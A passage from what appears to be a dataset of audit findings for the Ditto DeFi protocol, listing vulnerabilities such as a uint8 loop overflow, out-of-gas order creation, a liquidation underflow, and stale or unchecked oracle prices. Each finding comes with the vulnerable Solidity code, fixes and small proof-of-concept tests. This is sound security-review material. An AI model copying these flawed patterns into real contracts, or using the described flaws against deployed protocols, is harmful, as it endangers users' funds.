reusable orderIds. When there are more than 65,500 orders DAO can cancel up to 1,000 orders. Here are the code blocks from `cancelOrderFarFromOracle` function which allows DAO to cancel orders. It also allows user to cancel one order.\\nIt makes sure that there are more than 65,000 orders.\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that DAO can't cancel more than 1,000 orders.\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\nLater `cancelOrderFarFromOracle` checks if `msg.sender == LibDiamond.diamondStorage().contractOwner` and based on the boolean value (true or false) of this statement it allows to cancel the desired amount of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol) which is called on the mapping of orders of specified earlier `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n \\n```\\n\\nThis function receives parameters:\\nmapping of orders to cancel\\naddress of asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nWhen we look at the implementation of this function we can see that `uint8` was used as a variable for the iteration in the `for loop`. `uint8` i maximum value is `255`. As we can see in the `for loop` there is `unchecked` statement which allows uint underflow / overflow.\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nSo when we try to add 1 to 255 (255 + 1) solidity would automaticly `revert` due to uint overflow but when we use `unchecked` solidity allows us to do this operation and the result of this will be `0`.\\nWhen DAO would like to cancel more than 255 orders it would result in infinite loop since:\\nthe for loop will iterate when `i` < numOrdersToCancel\\nthe vaule of `i` will always be less than 256 because it can't get bigger than that due to overflow\\n`i = 255` and `i < 256` `unchecked {++i;}` Next iteration `i = 0` and `i < 256` `unchecked {++i;}`\\nI created pretty simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 orders cancelations run this function with input parameter (amountOfItertions) equal to 256 or above.\\nFurther explenation\\nAfter DAO tries to cancel more than 255 orders the infinite loop will be created which will terminate the transaction.\\nThe transaction will fail because of gas consumption. For loop will run as many times as it can with provided gas. Since it will try to run infinitely it will run out of gas.",To solve this problem change `uint8 i` to `uint16` or any higher uint that can handle the desired amount of iterations.,"Protocol documentation states that DAO is able to cancel 1,000 orders. Since it is not possible with the current implementation of the code this issue disrupts protocols functionality. The implemented code can't handle desired functionality.\\nTools used\\nVScode, Manual Review, Remix",```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n +Order creation can run out of gas since relying on previous order matchtype,medium,"If the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.",I think the probability of the above scenario is higher than that of multiple user's cancelling their orders. Hence moving to the next hint order as soon as the current hint order has been found to be reused could be better and will cost less gas on error.,"Order creation can run out-of-gas on particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/test/AskSellOrders.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/AskSellOrders.t.sol\\n@@ // Remove the line below\\n8,7 // Add the line below\\n8,7 @@ import {Errors} from ""contracts/libraries/Errors.sol"";\\n import {STypes, MTypes, O} from ""contracts/libraries/DataTypes.sol"";\\n \\n import {OBFixture} from ""test/utils/OBFixture.sol"";\\n// Remove the line below\\n// import {console} from ""contracts/libraries/console.sol"";\\n// Add the line below\\nimport {console} from ""contracts/libraries/console.sol"";\\n \\n contract SellOrdersTest is OBFixture {\\n using U256 for uint256;\\n@@ // Remove the line below\\n59,6 // Add the line below\\n59,49 @@ contract SellOrdersTest is OBFixture {\\n assertEq(asks[0].price, DEFAULT_PRICE);\\n }\\n \\n// Add the line below\\n function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n// Add the line below\\n for (uint256 i = 0; i < 1000; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // a new order at the bottom of the order book\\n// Add the line below\\n fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n// Add the line below\\n assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n// Add the line below\\n\\n// Add the line below\\n // user wants to create an order at HIGHER_PRICE\\n// Add the line below\\n MTypes.OrderHint[] memory orderHintArray =\\n// Add the line below\\n diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n// Add the line below\\n uint16 targetOrderId = orderHintArray[0].hintId;\\n// Add the line below\\n assertTrue(targetOrderId == getAsks()[1000].id);\\n// Add the line below\\n\\n// Add the line below\\n // the target order gets cancelled\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n cancelAsk(targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a person creates a limit ask which reuses the cancelled order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a bid matches the targetId\\n// Add the line below\\n fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n // another person creates a limit ask which reuses the matched order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // the tx of the user goes through\\n// Add the line below\\n depositUsd(sender, DEFAULT_AMOUNT);\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n uint256 gasStart = gasleft();\\n// Add the line below\\n diamond.createAsk(\\n// Add the line below\\n asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n// Add the line below\\n );\\n// Add the line below\\n uint256 gasUsed = gasStart // Remove the line below\\n gasleft();\\n// Add the line below\\n assertGt(gasUsed, 2_000_000);\\n// Add the line below\\n console.log(gasUsed);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\n","```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n" +Secondary short liquidation reverts due to arithmetic underflow in volatile market conditions,medium,"The `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidateable short position (simplified, ignores decimal precision for this demonstration):\\nCollateral Debt Collateralization Ratio (based on spot price) Price ETH/USD Spot Price TOKEN/ETH Cached Price TOKEN/ETH\\n1 ETH 1400 TOKEN $${1 \\over {1400 * 0.0005}} \\approx 142\\%$$ 2000 0.0005 0.00075\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\ &= 1400 \\cdot 0.00075 \\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to cached price older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $ 1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `m.short.collateral` is subtracted by `ercDebtAtOraclePrice` -> $1 - 1.05= -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!","Consider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.","The secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.",```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n +Lack of essential stale check in oracleCircuitBreaker(),medium,"The `LibOracle::oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: ""block.timestamp > 2 hours + baseTimeStamp"", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: ""block.timestamp > 2 hours + baseTimeStamp""\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73","Add the condition: ""block.timestamp > 2 hours + baseTimeStamp"" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n// Remove the line below\\n || baseChainlinkPrice <= 0;\\n// Add the line below\\n || baseChainlinkPrice <= 0 || block.timestamp > 2 hours // Add the line below\\n baseTimeStamp;\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n```\\n","This report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.","```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: ""block.timestamp > 2 hours + baseTimeStamp""\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n" +"LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation",low,"As per the documentation, LibOracle should only be returning the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This is to ensure the fidelity of the data, which reduces the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of chainlink data. In this case, LibOracle simply returns the TWAP price without checking if there's enough liquidity in the pool. This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting should be the correct action rather than returning the TWAP price without checking the liquidity, as even when there is a valid chainlink price, if the TWAP price is closer to the cached price (and there isn't enough liquidity), it will still revert.\\nLibOracle has a `baseOracleCircuitBreaker` function which handles whether to return the TWAP price or the chainlink price, when the asset is USD, and it is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the chainlink price was not properly fetched, it will always return `twapPriceInv`. However, this lacks any checks as to whether there is at least 100 WETH in the Uniswap pool, which can result in a lack of data fidelity.","LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation\\nBefore returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.","When the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.","```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n" +Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratio,medium,"The `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio (based on the asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the calculated `cRatio` in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.",Consider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.,"Short-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.","```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n" +Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` function,low,"Updating the vault's yield rate in the `LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` 